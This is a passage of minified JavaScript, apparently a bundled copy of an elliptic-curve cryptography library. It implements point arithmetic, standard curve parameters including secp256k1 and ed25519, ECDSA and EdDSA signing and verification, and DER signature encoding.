_=this.endo.basis,y=_[0],M=_[1],p=M.b.mul(b).divRound(this.n),D=y.b.neg().mul(b).divRound(this.n),w=p.mul(y.a),x=D.mul(M.a),S=p.mul(y.b),O=D.mul(M.b);return{k1:b.sub(w).sub(x),k2:S.add(O).neg()}},Q.prototype.pointFromX=function(b,_){(b=new j(b,16)).red||(b=b.toRed(this.red));var y=b.redSqr().redMul(b).redIAdd(b.redMul(this.a)).redIAdd(this.b),M=y.redSqrt();if(0!==M.redSqr().redSub(y).cmp(this.zero))throw new Error("invalid point");var p=M.fromRed().isOdd();return(_&&!p||!_&&p)&&(M=M.redNeg()),this.point(b,M)},Q.prototype.validate=function(b){if(b.inf)return!0;var _=b.x,y=b.y,M=this.a.redMul(_),p=_.redSqr().redMul(_).redIAdd(M).redIAdd(this.b);return 0===y.redSqr().redISub(p).cmpn(0)},Q.prototype._endoWnafMulAdd=function(b,_,y){for(var M=this._endoWnafT1,p=this._endoWnafT2,D=0;D<b.length;D++){var w=this._endoSplit(_[D]),x=b[D],S=x._getBeta();w.k1.negative&&(w.k1.ineg(),x=x.neg(!0)),w.k2.negative&&(w.k2.ineg(),S=S.neg(!0)),M[2*D]=x,M[2*D+1]=S,p[2*D]=w.k1,p[2*D+1]=w.k2}for(var O=this._wnafMulAdd(1,M,p,2*D,y),U=0;U<2*D;U++)M[U]=null,p[U]=null;return O},$(F,ae.BasePoint),Q.prototype.point=function(b,_,y){return new F(this,b,_,y)},Q.prototype.pointFromJSON=function(b,_){return F.fromJSON(this,b,_)},F.prototype._getBeta=function(){if(this.curve.endo){var b=this.precomputed;if(b&&b.beta)return b.beta;var _=this.curve.point(this.x.redMul(this.curve.endo.beta),this.y);if(b){var y=this.curve,M=function(p){return y.point(p.x.redMul(y.endo.beta),p.y)};b.beta=_,_.precomputed={beta:null,naf:b.naf&&{wnd:b.naf.wnd,points:b.naf.points.map(M)},doubles:b.doubles&&{step:b.doubles.step,points:b.doubles.points.map(M)}}}return _}},F.prototype.toJSON=function(){return this.precomputed?[this.x,this.y,this.precomputed&&{doubles:this.precomputed.doubles&&{step:this.precomputed.doubles.step,points:this.precomputed.doubles.points.slice(1)},naf:this.precomputed.naf&&{wnd:this.precomputed.naf.wnd,points:this.precomputed.naf.points.slice(1)}}]:[this.x,this.y]},F.fromJSON=function(b,_,y){"string"==typeof _&&(_=JSON.parse(_));var M=b.point(_[0],_[1],y);if(!_[2])return M;function p(w){return b.point(w[0],w[1],y)}var D=_[2];return M.precomputed={beta:null,doubles:D.doubles&&{step:D.doubles.step,points:[M].concat(D.doubles.points.map(p))},naf:D.naf&&{wnd:D.naf.wnd,points:[M].concat(D.naf.points.map(p))}},M},F.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" y: "+this.y.fromRed().toString(16,2)+">"},F.prototype.isInfinity=function(){return this.inf},F.prototype.add=function(b){if(this.inf)return b;if(b.inf)return this;if(this.eq(b))return this.dbl();if(this.neg().eq(b))return this.curve.point(null,null);if(0===this.x.cmp(b.x))return this.curve.point(null,null);var _=this.y.redSub(b.y);0!==_.cmpn(0)&&(_=_.redMul(this.x.redSub(b.x).redInvm()));var y=_.redSqr().redISub(this.x).redISub(b.x),M=_.redMul(this.x.redSub(y)).redISub(this.y);return this.curve.point(y,M)},F.prototype.dbl=function(){if(this.inf)return this;var b=this.y.redAdd(this.y);if(0===b.cmpn(0))return this.curve.point(null,null);var _=this.curve.a,y=this.x.redSqr(),M=b.redInvm(),p=y.redAdd(y).redIAdd(y).redIAdd(_).redMul(M),D=p.redSqr().redISub(this.x.redAdd(this.x)),w=p.redMul(this.x.redSub(D)).redISub(this.y);return this.curve.point(D,w)},F.prototype.getX=function(){return this.x.fromRed()},F.prototype.getY=function(){return this.y.fromRed()},F.prototype.mul=function(b){return b=new j(b,16),this.isInfinity()?this:this._hasDoubles(b)?this.curve._fixedNafMul(this,b):this.curve.endo?this.curve._endoWnafMulAdd([this],[b]):this.curve._wnafMul(this,b)},F.prototype.mulAdd=function(b,_,y){var M=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(M,p):this.curve._wnafMulAdd(1,M,p,2)},F.prototype.jmulAdd=function(b,_,y){var M=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(M,p,!0):this.curve._wnafMulAdd(1,M,p,2,!0)},F.prototype.eq=function(b){return this===b||this.inf===b.inf&&(this.inf||0===this.x.cmp(b.x)&&0===this.y.cmp(b.y))},F.prototype.neg=function(b){if(this.inf)return this;var _=this.curve.point(this.x,this.y.redNeg());if(b&&this.precomputed){var y=this.precomputed,M=function(p){return p.neg()};_.precomputed={naf:y.naf&&{wnd:y.naf.wnd,points:y.naf.points.map(M)},doubles:y.doubles&&{step:y.doubles.step,points:y.doubles.points.map(M)}}}return _},F.prototype.toJ=function(){return this.inf?this.curve.jpoint(null,null,null):this.curve.jpoint(this.x,this.y,this.curve.one)},$(E,ae.BasePoint),Q.prototype.jpoint=function(b,_,y){return new E(this,b,_,y)},E.prototype.toP=function(){if(this.isInfinity())return this.curve.point(null,null);var b=this.z.redInvm(),_=b.redSqr(),y=this.x.redMul(_),M=this.y.redMul(_).redMul(b);return this.curve.point(y,M)},E.prototype.neg=function(){return this.curve.jpoint(this.x,this.y.redNeg(),this.z)},E.prototype.add=function(b){if(this.isInfinity())return b;if(b.isInfinity())return this;var _=b.z.redSqr(),y=this.z.redSqr(),M=this.x.redMul(_),p=b.x.redMul(y),D=this.y.redMul(_.redMul(b.z)),w=b.y.redMul(y.redMul(this.z)),x=M.redSub(p),S=D.redSub(w);if(0===x.cmpn(0))return 0!==S.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var O=x.redSqr(),U=O.redMul(x),K=M.redMul(O),ee=S.redSqr().redIAdd(U).redISub(K).redISub(K),se=S.redMul(K.redISub(ee)).redISub(D.redMul(U)),ve=this.z.redMul(b.z).redMul(x);return this.curve.jpoint(ee,se,ve)},E.prototype.mixedAdd=function(b){if(this.isInfinity())return b.toJ();if(b.isInfinity())return this;var _=this.z.redSqr(),y=this.x,M=b.x.redMul(_),p=this.y,D=b.y.redMul(_).redMul(this.z),w=y.redSub(M),x=p.redSub(D);if(0===w.cmpn(0))return 0!==x.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var S=w.redSqr(),O=S.redMul(w),U=y.redMul(S),K=x.redSqr().redIAdd(O).redISub(U).redISub(U),ee=x.redMul(U.redISub(K)).redISub(p.redMul(O)),se=this.z.redMul(w);return this.curve.jpoint(K,ee,se)},E.prototype.dblp=function(b){if(0===b)return this;if(this.isInfinity())return this;if(!b)return this.dbl();var _;if(this.curve.zeroA||this.curve.threeA){var y=this;for(_=0;_<b;_++)y=y.dbl();return y}var M=this.curve.a,p=this.curve.tinv,D=this.x,w=this.y,x=this.z,S=x.redSqr().redSqr(),O=w.redAdd(w);for(_=0;_<b;_++){var U=D.redSqr(),K=O.redSqr(),ee=K.redSqr(),se=U.redAdd(U).redIAdd(U).redIAdd(M.redMul(S)),ve=D.redMul(K),le=se.redSqr().redISub(ve.redAdd(ve)),ye=ve.redISub(le),z=se.redMul(ye);z=z.redIAdd(z).redISub(ee);var l=O.redMul(x);_+1<b&&(S=S.redMul(ee)),D=le,x=l,O=z}return this.curve.jpoint(D,O.redMul(p),x)},E.prototype.dbl=function(){return this.isInfinity()?this:this.curve.zeroA?this._zeroDbl():this.curve.threeA?this._threeDbl():this._dbl()},E.prototype._zeroDbl=function(){var b,_,y;if(this.zOne){var M=this.x.redSqr(),p=this.y.redSqr(),D=p.redSqr(),w=this.x.redAdd(p).redSqr().redISub(M).redISub(D);w=w.redIAdd(w);var x=M.redAdd(M).redIAdd(M),S=x.redSqr().redISub(w).redISub(w),O=D.redIAdd(D);O=(O=O.redIAdd(O)).redIAdd(O),b=S,_=x.redMul(w.redISub(S)).redISub(O),y=this.y.redAdd(this.y)}else{var U=this.x.redSqr(),K=this.y.redSqr(),ee=K.redSqr(),se=this.x.redAdd(K).redSqr().redISub(U).redISub(ee);se=se.redIAdd(se);var ve=U.redAdd(U).redIAdd(U),le=ve.redSqr(),ye=ee.redIAdd(ee);ye=(ye=ye.redIAdd(ye)).redIAdd(ye),b=le.redISub(se).redISub(se),_=ve.redMul(se.redISub(b)).redISub(ye),y=(y=this.y.redMul(this.z)).redIAdd(y)}return this.curve.jpoint(b,_,y)},E.prototype._threeDbl=function(){var b,_,y;if(this.zOne){var M=this.x.redSqr(),p=this.y.redSqr(),D=p.redSqr(),w=this.x.redAdd(p).redSqr().redISub(M).redISub(D);w=w.redIAdd(w);var x=M.redAdd(M).redIAdd(M).redIAdd(this.curve.a),S=x.redSqr().redISub(w).redISub(w);b=S;var O=D.redIAdd(D);O=(O=O.redIAdd(O)).redIAdd(O),_=x.redMul(w.redISub(S)).redISub(O),y=this.y.redAdd(this.y)}else{var U=this.z.redSqr(),K=this.y.redSqr(),ee=this.x.redMul(K),se=this.x.redSub(U).redMul(this.x.redAdd(U));se=se.redAdd(se).redIAdd(se);var ve=ee.redIAdd(ee),le=(ve=ve.redIAdd(ve)).redAdd(ve);b=se.redSqr().redISub(le),y=this.y.redAdd(this.z).redSqr().redISub(K).redISub(U);var ye=K.redSqr();ye=(ye=(ye=ye.redIAdd(ye)).redIAdd(ye)).redIAdd(ye),_=se.redMul(ve.redISub(b)).redISub(ye)}return this.curve.jpoint(b,_,y)},E.prototype._dbl=function(){var b=this.curve.a,_=this.x,y=this.y,M=this.z,p=M.redSqr().redSqr(),D=_.redSqr(),w=y.redSqr(),x=D.redAdd(D).redIAdd(D).redIAdd(b.redMul(p)),S=_.redAdd(_),O=(S=S.redIAdd(S)).redMul(w),U=x.redSqr().redISub(O.redAdd(O)),K=O.redISub(U),ee=w.redSqr();ee=(ee=(ee=ee.redIAdd(ee)).redIAdd(ee)).redIAdd(ee);var se=x.redMul(K).redISub(ee),ve=y.redAdd(y).redMul(M);return this.curve.jpoint(U,se,ve)},E.prototype.trpl=function(){if(!this.curve.zeroA)return this.dbl().add(this);var b=this.x.redSqr(),_=this.y.redSqr(),y=this.z.redSqr(),M=_.redSqr(),p=b.redAdd(b).redIAdd(b),D=p.redSqr(),w=this.x.redAdd(_).redSqr().redISub(b).redISub(M),x=(w=(w=(w=w.redIAdd(w)).redAdd(w).redIAdd(w)).redISub(D)).redSqr(),S=M.redIAdd(M);S=(S=(S=S.redIAdd(S)).redIAdd(S)).redIAdd(S);var O=p.redIAdd(w).redSqr().redISub(D).redISub(x).redISub(S),U=_.redMul(O);U=(U=U.redIAdd(U)).redIAdd(U);var K=this.x.redMul(x).redISub(U);K=(K=K.redIAdd(K)).redIAdd(K);var ee=this.y.redMul(O.redMul(S.redISub(O)).redISub(w.redMul(x)));ee=(ee=(ee=ee.redIAdd(ee)).redIAdd(ee)).redIAdd(ee);var se=this.z.redAdd(w).redSqr().redISub(y).redISub(x);return this.curve.jpoint(K,ee,se)},E.prototype.mul=function(b,_){return b=new j(b,_),this.curve._wnafMul(this,b)},E.prototype.eq=function(b){if("affine"===b.type)return this.eq(b.toJ());if(this===b)return!0;var _=this.z.redSqr(),y=b.z.redSqr();if(0!==this.x.redMul(y).redISub(b.x.redMul(_)).cmpn(0))return!1;var M=_.redMul(this.z),p=y.redMul(b.z);return 0===this.y.redMul(p).redISub(b.y.redMul(M)).cmpn(0)},E.prototype.eqXToP=function(b){var _=this.z.redSqr(),y=b.toRed(this.curve.red).redMul(_);if(0===this.x.cmp(y))return!0;for(var M=b.clone(),p=this.curve.redN.redMul(_);;){if(M.iadd(this.curve.n),M.cmp(this.curve.p)>=0)return!1;if(y.redIAdd(p),0===this.x.cmp(y))return!0}},E.prototype.inspect=function(){return this.isInfinity()?"<EC JPoint Infinity>":"<EC JPoint x: "+this.x.toString(16,2)+" y: "+this.y.toString(16,2)+" z: "+this.z.toString(16,2)+">"},E.prototype.isInfinity=function(){return 0===this.z.cmpn(0)}},1915:(Pe,we,de)=>{"use strict";var E,ie=we,j=de(8414),$=de(6186),I=de(7e3).assert;function Q(g){this.curve="short"===g.type?new $.short(g):"edwards"===g.type?new $.edwards(g):new $.mont(g),this.g=this.curve.g,this.n=this.curve.n,this.hash=g.hash,I(this.g.validate(),"Invalid curve"),I(this.g.mul(this.n).isInfinity(),"Invalid curve, G*N != O")}function F(g,b){Object.defineProperty(ie,g,{configurable:!0,enumerable:!0,get:function(){var _=new Q(b);return Object.defineProperty(ie,g,{configurable:!0,enumerable:!0,value:_}),_}})}ie.PresetCurve=Q,F("p192",{type:"short",prime:"p192",p:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff",a:"ffffffff ffffffff ffffffff fffffffe ffffffff fffffffc",b:"64210519 e59c80e7 0fa7e9ab 72243049 feb8deec c146b9b1",n:"ffffffff ffffffff ffffffff 99def836 146bc9b1 b4d22831",hash:j.sha256,gRed:!1,g:["188da80e b03090f6 7cbf20eb 43a18800 f4ff0afd 82ff1012","07192b95 ffc8da78 631011ed 6b24cdd5 73f977a1 1e794811"]}),F("p224",{type:"short",prime:"p224",p:"ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001",a:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff fffffffe",b:"b4050a85 0c04b3ab f5413256 5044b0b7 d7bfd8ba 270b3943 2355ffb4",n:"ffffffff ffffffff ffffffff ffff16a2 e0b8f03e 13dd2945 5c5c2a3d",hash:j.sha256,gRed:!1,g:["b70e0cbd 6bb4bf7f 321390b9 4a03c1d3 56c21122 343280d6 115c1d21","bd376388 b5f723fb 4c22dfe6 cd4375a0 5a074764 44d58199 85007e34"]}),F("p256",{type:"short",prime:null,p:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff ffffffff",a:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff fffffffc",b:"5ac635d8 aa3a93e7 b3ebbd55 769886bc 651d06b0 cc53b0f6 3bce3c3e 27d2604b",n:"ffffffff 00000000 ffffffff ffffffff bce6faad a7179e84 f3b9cac2 fc632551",hash:j.sha256,gRed:!1,g:["6b17d1f2 e12c4247 f8bce6e5 63a440f2 77037d81 2deb33a0 f4a13945 d898c296","4fe342e2 fe1a7f9b 8ee7eb4a 7c0f9e16 2bce3357 6b315ece cbb64068 37bf51f5"]}),F("p384",{type:"short",prime:null,p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 ffffffff",a:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 fffffffc",b:"b3312fa7 e23ee7e4 988e056b e3f82d19 181d9c6e fe814112 0314088f 5013875a c656398d 8a2ed19d 2a85c8ed d3ec2aef",n:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff c7634d81 f4372ddf 581a0db2 48b0a77a ecec196a ccc52973",hash:j.sha384,gRed:!1,g:["aa87ca22 be8b0537 8eb1c71e f320ad74 6e1d3b62 8ba79b98 59f741e0 82542a38 5502f25d bf55296c 3a545e38 72760ab7","3617de4a 96262c6f 5d9e98bf 9292dc29 f8f41dbd 289a147c e9da3113 b5f0b8c0 0a60b1ce 1d7e819d 7a431d7c 90ea0e5f"]}),F("p521",{type:"short",prime:null,p:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff",a:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffc",b:"00000051 953eb961 8e1c9a1f 929a21a0 b68540ee a2da725b 99b315f3 b8b48991 8ef109e1 56193951 ec7e937b 1652c0bd 3bb1bf07 3573df88 3d2c34f1 ef451fd4 6b503f00",n:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffa 51868783 bf2f966b 7fcc0148 f709a5d0 3bb5c9b8 899c47ae bb6fb71e 91386409",hash:j.sha512,gRed:!1,g:["000000c6 858e06b7 0404e9cd 9e3ecb66 2395b442 9c648139 053fb521 f828af60 6b4d3dba a14b5e77 efe75928 fe1dc127 a2ffa8de 3348b3c1 856a429b f97e7e31 c2e5bd66","00000118 39296a78 9a3bc004 5c8a5fb4 2c7d1bd9 98f54449 579b4468 17afbd17 273e662c 97ee7299 5ef42640 c550b901 3fad0761 353c7086 a272c240 88be9476 9fd16650"]}),F("curve25519",{type:"mont",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"76d06",b:"1",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["9"]}),F("ed25519",{type:"edwards",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"-1",c:"1",d:"52036cee2b6ffe73 8cc740797779e898 00700a4d4141d8ab 75eb4dca135978a3",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["216936d3cd6e53fec0a4e231fdd6dc5c692cc7609525a7b2c9562d608f25d51a","6666666666666666666666666666666666666666666666666666666666666658"]});try{E=de(5862)}catch(g){E=void 0}F("secp256k1",{type:"short",prime:"k256",p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f",a:"0",b:"7",n:"ffffffff ffffffff ffffffff fffffffe baaedce6 af48a03b bfd25e8c d0364141",h:"1",hash:j.sha256,beta:"7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee",lambda:"5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72",basis:[{a:"3086d221a7d46bcde86c90e49284eb15",b:"-e4437ed6010e88286f547fa90abfe4c3"},{a:"114ca50f7a8e2f3f657c1108d9d44cfd8",b:"3086d221a7d46bcde86c90e49284eb15"}],gRed:!1,g:["79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798","483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8",E]})},7949:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(8116),$=de(7e3),ae=de(1915),I=de(9598),Q=$.assert,F=de(4602),E=de(7327);function g(b){if(!(this instanceof g))return new g(b);"string"==typeof b&&(Q(Object.prototype.hasOwnProperty.call(ae,b),"Unknown curve "+b),b=ae[b]),b instanceof ae.PresetCurve&&(b={curve:b}),this.curve=b.curve.curve,this.n=this.curve.n,this.nh=this.n.ushrn(1),this.g=this.curve.g,this.g=b.curve.g,this.g.precompute(b.curve.n.bitLength()+1),this.hash=b.hash||b.curve.hash}Pe.exports=g,g.prototype.keyPair=function(_){return new F(this,_)},g.prototype.keyFromPrivate=function(_,y){return F.fromPrivate(this,_,y)},g.prototype.keyFromPublic=function(_,y){return F.fromPublic(this,_,y)},g.prototype.genKeyPair=function(_){_||(_={});for(var y=new j({hash:this.hash,pers:_.pers,persEnc:_.persEnc||"utf8",entropy:_.entropy||I(this.hash.hmacStrength),entropyEnc:_.entropy&&_.entropyEnc||"utf8",nonce:this.n.toArray()}),M=this.n.byteLength(),p=this.n.sub(new ie(2));;){var D=new ie(y.generate(M));if(!(D.cmp(p)>0))return D.iaddn(1),this.keyFromPrivate(D)}},g.prototype._truncateToN=function(_,y){var M=8*_.byteLength()-this.n.bitLength();return M>0&&(_=_.ushrn(M)),!y&&_.cmp(this.n)>=0?_.sub(this.n):_},g.prototype.sign=function(_,y,M,p){"object"==typeof M&&(p=M,M=null),p||(p={}),y=this.keyFromPrivate(y,M),_=this._truncateToN(new ie(_,16));for(var D=this.n.byteLength(),w=y.getPrivate().toArray("be",D),x=_.toArray("be",D),S=new j({hash:this.hash,entropy:w,nonce:x,pers:p.pers,persEnc:p.persEnc||"utf8"}),O=this.n.sub(new ie(1)),U=0;;U++){var K=p.k?p.k(U):new ie(S.generate(this.n.byteLength()));if(!((K=this._truncateToN(K,!0)).cmpn(1)<=0||K.cmp(O)>=0)){var ee=this.g.mul(K);if(!ee.isInfinity()){var se=ee.getX(),ve=se.umod(this.n);if(0!==ve.cmpn(0)){var le=K.invm(this.n).mul(ve.mul(y.getPrivate()).iadd(_));if(0!==(le=le.umod(this.n)).cmpn(0)){var ye=(ee.getY().isOdd()?1:0)|(0!==se.cmp(ve)?2:0);return p.canonical&&le.cmp(this.nh)>0&&(le=this.n.sub(le),ye^=1),new E({r:ve,s:le,recoveryParam:ye})}}}}}},g.prototype.verify=function(_,y,M,p){_=this._truncateToN(new ie(_,16)),M=this.keyFromPublic(M,p);var D=(y=new E(y,"hex")).r,w=y.s;if(D.cmpn(1)<0||D.cmp(this.n)>=0||w.cmpn(1)<0||w.cmp(this.n)>=0)return!1;var U,x=w.invm(this.n),S=x.mul(_).umod(this.n),O=x.mul(D).umod(this.n);return this.curve._maxwellTrick?!(U=this.g.jmulAdd(S,M.getPublic(),O)).isInfinity()&&U.eqXToP(D):!(U=this.g.mulAdd(S,M.getPublic(),O)).isInfinity()&&0===U.getX().umod(this.n).cmp(D)},g.prototype.recoverPubKey=function(b,_,y,M){Q((3&y)===y,"The recovery param is more than two bits"),_=new E(_,M);var p=this.n,D=new ie(b),w=_.r,x=_.s,S=1&y,O=y>>1;if(w.cmp(this.curve.p.umod(this.curve.n))>=0&&O)throw new Error("Unable to find sencond key candinate");w=this.curve.pointFromX(O?w.add(this.curve.n):w,S);var U=_.r.invm(p),K=p.sub(D).mul(U).umod(p),ee=x.mul(U).umod(p);return this.g.mulAdd(K,w,ee)},g.prototype.getKeyRecoveryParam=function(b,_,y,M){if(null!==(_=new E(_,M)).recoveryParam)return _.recoveryParam;for(var p=0;p<4;p++){var D;try{D=this.recoverPubKey(b,_,p)}catch(w){continue}if(D.eq(y))return p}throw new Error("Unable to find valid recovery factor")}},4602:(Pe,we,de)=>{"use strict";var ie=de(1959),$=de(7e3).assert;function ae(I,Q){this.ec=I,this.priv=null,this.pub=null,Q.priv&&this._importPrivate(Q.priv,Q.privEnc),Q.pub&&this._importPublic(Q.pub,Q.pubEnc)}Pe.exports=ae,ae.fromPublic=function(Q,F,E){return F instanceof ae?F:new ae(Q,{pub:F,pubEnc:E})},ae.fromPrivate=function(Q,F,E){return F instanceof ae?F:new ae(Q,{priv:F,privEnc:E})},ae.prototype.validate=function(){var Q=this.getPublic();return Q.isInfinity()?{result:!1,reason:"Invalid public key"}:Q.validate()?Q.mul(this.ec.curve.n).isInfinity()?{result:!0,reason:null}:{result:!1,reason:"Public key * N != O"}:{result:!1,reason:"Public key is not a point"}},ae.prototype.getPublic=function(Q,F){return"string"==typeof Q&&(F=Q,Q=null),this.pub||(this.pub=this.ec.g.mul(this.priv)),F?this.pub.encode(F,Q):this.pub},ae.prototype.getPrivate=function(Q){return"hex"===Q?this.priv.toString(16,2):this.priv},ae.prototype._importPrivate=function(Q,F){this.priv=new ie(Q,F||16),this.priv=this.priv.umod(this.ec.curve.n)},ae.prototype._importPublic=function(Q,F){if(Q.x||Q.y)return"mont"===this.ec.curve.type?$(Q.x,"Need x coordinate"):("short"===this.ec.curve.type||"edwards"===this.ec.curve.type)&&$(Q.x&&Q.y,"Need both x and y coordinate"),void(this.pub=this.ec.curve.point(Q.x,Q.y));this.pub=this.ec.curve.decodePoint(Q,F)},ae.prototype.derive=function(Q){return Q.validate()||$(Q.validate(),"public point not validated"),Q.mul(this.priv).getX()},ae.prototype.sign=function(Q,F,E){return this.ec.sign(Q,this,F,E)},ae.prototype.verify=function(Q,F){return this.ec.verify(Q,F,this)},ae.prototype.inspect=function(){return"<Key priv: "+(this.priv&&this.priv.toString(16,2))+" pub: "+(this.pub&&this.pub.inspect())+" >"}},7327:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.assert;function ae(g,b){if(g instanceof ae)return g;this._importDER(g,b)||($(g.r&&g.s,"Signature without r or s"),this.r=new ie(g.r,16),this.s=new ie(g.s,16),this.recoveryParam=void 0===g.recoveryParam?null:g.recoveryParam)}function I(){this.place=0}function Q(g,b){var _=g[b.place++];if(!(128&_))return _;var y=15&_;if(0===y||y>4)return!1;for(var M=0,p=0,D=b.place;p<y;p++,D++)M<<=8,M|=g[D],M>>>=0;return!(M<=127)&&(b.place=D,M)}function F(g){for(var b=0,_=g.length-1;!g[b]&&!(128&g[b+1])&&b<_;)b++;return 0===b?g:g.slice(b)}function E(g,b){if(b<128)g.push(b);else{var _=1+(Math.log(b)/Math.LN2>>>3);for(g.push(128|_);--_;)g.push(b>>>(_<<3)&255);g.push(b)}}Pe.exports=ae,ae.prototype._importDER=function(b,_){b=j.toArray(b,_);var y=new I;if(48!==b[y.place++])return!1;var M=Q(b,y);if(!1===M||M+y.place!==b.length||2!==b[y.place++])return!1;var p=Q(b,y);if(!1===p)return!1;var D=b.slice(y.place,p+y.place);if(y.place+=p,2!==b[y.place++])return!1;var w=Q(b,y);if(!1===w||b.length!==w+y.place)return!1;var x=b.slice(y.place,w+y.place);if(0===D[0]){if(!(128&D[1]))return!1;D=D.slice(1)}if(0===x[0]){if(!(128&x[1]))return!1;x=x.slice(1)}return this.r=new ie(D),this.s=new ie(x),this.recoveryParam=null,!0},ae.prototype.toDER=function(b){var _=this.r.toArray(),y=this.s.toArray();for(128&_[0]&&(_=[0].concat(_)),128&y[0]&&(y=[0].concat(y)),_=F(_),y=F(y);!(y[0]||128&y[1]);)y=y.slice(1);var M=[2];E(M,_.length),(M=M.concat(_)).push(2),E(M,y.length);var p=M.concat(y),D=[48];return E(D,p.length),D=D.concat(p),j.encode(D,b)}},8593:(Pe,we,de)=>{"use strict";var ie=de(8414),j=de(1915),$=de(7e3),ae=$.assert,I=$.parseBytes,Q=de(993),F=de(2131);function E(g){if(ae("ed25519"===g,"only tested with ed25519 so far"),!(this instanceof E))return new E(g);this.curve=g=j[g].curve,this.g=g.g,this.g.precompute(g.n.bitLength()+1),this.pointClass=g.point().constructor,this.encodingLength=Math.ceil(g.n.bitLength()/8),this.hash=ie.sha512}Pe.exports=E,E.prototype.sign=function(b,_){b=I(b);var y=this.keyFromSecret(_),M=this.hashInt(y.messagePrefix(),b),p=this.g.mul(M),D=this.encodePoint(p),w=this.hashInt(D,y.pubBytes(),b).mul(y.priv()),x=M.add(w).umod(this.curve.n);return this.makeSignature({R:p,S:x,Rencoded:D})},E.prototype.verify=function(b,_,y){b=I(b),_=this.makeSignature(_);var M=this.keyFromPublic(y),p=this.hashInt(_.Rencoded(),M.pubBytes(),b),D=this.g.mul(_.S());return _.R().add(M.pub().mul(p)).eq(D)},E.prototype.hashInt=function(){for(var b=this.hash(),_=0;_<arguments.length;_++)b.update(arguments[_]);return $.intFromLE(b.digest()).umod(this.curve.n)},E.prototype.keyFromPublic=function(b){return Q.fromPublic(this,b)},E.prototype.keyFromSecret=function(b){return Q.fromSecret(this,b)},E.prototype.makeSignature=function(b){return b instanceof F?b:new F(this,b)},E.prototype.encodePoint=function(b){var _=b.getY().toArray("le",this.encodingLength);return _[this.encodingLength-1]|=b.getX().isOdd()?128:0,_},E.prototype.decodePoint=function(b){var _=(b=$.parseBytes(b)).length-1,y=b.slice(0,_).concat(-129&b[_]),M=0!=(128&b[_]),p=$.intFromLE(y);return this.curve.pointFromY(p,M)},E.prototype.encodeInt=function(b){return b.toArray("le",this.encodingLength)},E.prototype.decodeInt=function(b){return $.intFromLE(b)},E.prototype.isPoint=function(b){return b instanceof this.pointClass}},993:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=ie.assert,$=ie.parseBytes,ae=ie.cachedProperty;function I(Q,F){this.eddsa=Q,this._secret=$(F.secret),Q.isPoint(F.pub)?this._pub=F.pub:this._pubBytes=$(F.pub)}I.fromPublic=function(F,E){return E instanceof I?E:new I(F,{pub:E})},I.fromSecret=function(F,E){return E instanceof I?E:new I(F,{secret:E})},I.prototype.secret=function(){return this._secret},ae(I,"pubBytes",function(){return this.eddsa.encodePoint(this.pub())}),ae(I,"pub",function(){return this._pubBytes?this.eddsa.decodePoint(this._pubBytes):this.eddsa.g.mul(this.priv())}),ae(I,"privBytes",function(){var F=this.eddsa,E=this.hash(),g=F.encodingLength-1,b=E.slice(0,F.encodingLength);return b[0]&=248,b[g]&=127,b[g]|=64,b}),ae(I,"priv",function(){return this.eddsa.decodeInt(this.privBytes())}),ae(I,"hash",function(){return this.eddsa.hash().update(this.secret()).digest()}),ae(I,"messagePrefix",function(){return this.hash().slice(this.eddsa.encodingLength)}),I.prototype.sign=function(F){return j(this._secret,"KeyPair can only verify"),this.eddsa.sign(F,this)},I.prototype.verify=function(F,E){return this.eddsa.verify(F,E,this)},I.prototype.getSecret=function(F){return j(this._secret,"KeyPair is public only"),ie.encode(this.secret(),F)},I.prototype.getPublic=function(F){return ie.encode(this.pubBytes(),F)},Pe.exports=I},2131:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.assert,ae=j.cachedProperty,I=j.parseBytes;function Q(F,E){this.eddsa=F,"object"!=typeof E&&(E=I(E)),Array.isArray(E)&&(E={R:E.slice(0,F.encodingLength),S:E.slice(F.encodingLength)}),$(E.R&&E.S,"Signature without R or S"),F.isPoint(E.R)&&(this._R=E.R),E.S instanceof ie&&(this._S=E.S),this._Rencoded=Array.isArray(E.R)?E.R:E.Rencoded,this._Sencoded=Array.isArray(E.S)?E.S:E.Sencoded}ae(Q,"S",function(){return this.eddsa.decodeInt(this.Sencoded())}),ae(Q,"R",function(){return this.eddsa.decodePoint(this.Rencoded())}),ae(Q,"Rencoded",function(){return this.eddsa.encodePoint(this.R())}),ae(Q,"Sencoded",function(){return 